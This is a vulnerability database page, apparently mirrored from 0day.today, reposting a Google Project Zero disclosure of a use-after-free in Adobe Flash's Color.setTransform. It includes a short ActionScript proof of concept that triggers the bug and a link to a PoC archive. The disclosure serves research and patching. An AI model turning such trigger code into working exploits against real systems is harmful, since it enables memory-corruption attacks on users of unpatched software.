Lucene search
K

Adobe Flash - Color.setTransform Use-After-Free

🗓️ 01 Apr 2016 00:00:00Reported by Google Security ResearchType 
zdt
 zdt
🔗 0day.today👁 39 Views

Adobe Flash - Color.setTransform Use-After-Free vulnerability in Adobe Flas

Related
Code
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=451
 
If Color.setTransform is set to a transform that deletes the field it is called on, a UaF occurs. A PoC is as follows:
 
var tf:TextField = this.createTextField("tf",1,1,1,4,4)
 
var n = new Object();
 
n.valueOf = function () {
    trace("here");
    tf.removeTextField()
}
 
var o = {ra: n, rb:8};
 
var c = new Color(tf)
c.setTransform(o)
 
 
A sample swf and fla are attached.
 
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39652.zip

#  0day.today [2017-12-31]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation